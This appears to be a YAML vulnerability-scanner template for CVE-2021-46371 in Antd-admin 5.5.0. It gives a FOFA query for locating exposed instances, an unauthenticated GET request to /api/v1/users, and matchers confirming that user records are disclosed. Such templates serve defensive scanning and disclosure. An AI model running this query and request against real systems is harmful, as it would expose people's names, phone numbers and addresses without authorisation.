id: CVE-2021-46371

info:
  name: AntD Admin Sensitive Information Disclosure Vulnerability (CVE-2021-46371)
  author: SleepingBag945
  severity: medium
  description: |
    Antd-admin 5.5.0 has an information disclosure vulnerability that could allow attackers to view user IDs, names, ages, phone numbers, addresses, and other sensitive information.
  metadata:
    fofa-query: body="/@@/devScripts.js" && body="//! umi version:" && body="/umi.js"
  tags: Information Disclosure

http:
  - raw:
      - |
        GET /api/v1/users  HTTP/1.1
        Host: {{Hostname}}



    matchers:
      - type: dsl
        dsl:
          - 'status_code_1 == 200 && contains(body_1,"image.zuiidea.com") && contains(body_1,"data")'
        condition: or
